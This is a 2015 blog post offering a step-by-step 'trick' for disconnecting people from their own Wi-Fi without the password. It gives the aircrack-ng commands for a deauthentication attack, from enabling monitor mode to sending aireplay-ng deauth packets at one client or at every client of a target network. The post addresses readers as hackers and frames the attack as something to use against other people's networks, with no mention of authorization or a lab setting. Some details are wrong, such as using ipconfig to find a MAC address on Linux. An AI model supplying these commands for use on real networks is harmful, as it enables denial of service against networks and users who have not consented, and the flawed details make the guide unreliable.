Please Click and Help Us get a domain...

Tuesday, December 8, 2015

Disconnect Anyone From His Own Wifi Without password.

Disconnect Anyone From His Own Wifi Without password.



Hello , hacker welcome to techproupdate today i have something good to tell you,you may heard many times that someone disconnect client from wifi without knowing his or her wifi password so if you wonder how does they do it,read this article...

Requirement for this trick.
Linux - Download
Aircrack-ng - Download

Steps to Disconnect Anyone From His Own Wifi Without Password

Step:1 - launch aircrack-ng type “airmon-ng” in terminal).

Step:2 - turn on monitor mode in your wireless card by typing “airmon-ng start wlan0) wlan0 should be your wireless interface (check your interface by typing “iwconfig in another terminal ).

Step:3 - as now your wireless card is in monitor mode it can be use to search wireless AP around you, so to see AP around you type “airodump-ng mon0” mon0 is your interface .

Step:3 - now choose wifi of which you want to disconnect client and copy its BSSID.And to focus on your particular target type airodump-ng -c (channel of your target AP) –bssid (BSSID of your Target AP) mon0.

Step:4 - take down his client by typing “aireplay-ng –deauth 10 -a (BSSID of your target AP) -c (MAC address of the client to be deauthenticated) mon0”

–deauth : number of deauthorization packet to be send, like we take 10 in this example above.

After this command “aireplay-ng –deauth 10 -a (BSSID of your target AP) -c (MAC address of the client to be deauthenticated) mon0” this particular client will disconnect from your target wifi .

Or if you want to take down all the connected client from your target wifi

then type : aireplay-ng –deauth 1000 -a (BSSID of your taget) -h (your mac address ) mon0. this command disconnect all the connected clients from target wifi.

To find your mac address open terminal and type “ipconfig”

This attack was known as :
Deauthentication Attack
Usage Tips
It is usually more effective to target a specific station using the -c parameter.

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them....

please can you help us get a domain.. (Click our Ads in here.. please do this for get a domain...)

0 අදහස්:

Post a Comment

Comment Here....